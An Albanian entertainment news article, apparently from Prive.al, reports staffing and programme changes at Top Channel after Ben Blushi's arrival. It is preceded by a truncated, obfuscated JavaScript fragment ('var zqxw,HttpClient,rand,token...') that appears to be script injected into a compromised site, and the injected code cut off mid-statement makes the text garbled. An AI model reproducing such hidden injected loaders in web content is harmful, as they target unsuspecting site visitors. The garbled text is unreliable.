;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ndryshime të mëdha në Top Channel?

By

Televizioni, dikur më i madh shqiptar, Top Channel po vazhdon të krijojë lajm me zhvillimet brenda tij.

Pas rreth të paktën tre vitesh rënie të lirë me largime e shkarkime masive, tashmë me ardhjen e Ben Blushit, në mes të një tentative për të rikthyer audiencën, përkundër spekulimeve për shitjen dhe problemet financiare, duket se Top media e ka seriozisht të rikthehet fuqishëm në sezonin e ri.

Deri tani janë konfirmuar një varg ndryshimesh.

Eno Popi më s’do jetë në program të mëngjesit, ka tentativa për rikthimin e Agron Llakajt dhe Jonida Shehu pas largimit të beftë do rikthehet me program të ri. Tutje, Klea Huta vjen me ‘Top of the Top’ por duket se këto s’do jenë ndryshimet e vetme.

Mediat në Shqipëri kanë raportuar sot se Ed Manushi do marrë drejtimin e programit ‘E diell’ bashkë me Fjoralba Ponarin ose Bora Zemanin (megjithëse nuk përjashtohet mundësia e të vazhdimit me dy prezantuese).

Foto: Fjoralba Ponari, Ed Manushi, Bora Zemani

Gjithashtu, Rudina Xhunga sipas gjasave do rikthehet me program politik dhe pasditja, nuk do i besohet Anila Çelas por gruas së Alban Dudushit, Bieta Sulos.

Foto: Bieta Sulo, prezantuesja e re e ‘Pasdite në Top Channel’

Përgjatë javëve në vazhdim priten edhe zhvillime të tjera.

A do e ketë seriozisht ngritjen e mirëfilltë Top Channel? Mbetet të shihet nga Shtatori e tutje. /Prive.al

Artikuj të ngjashëm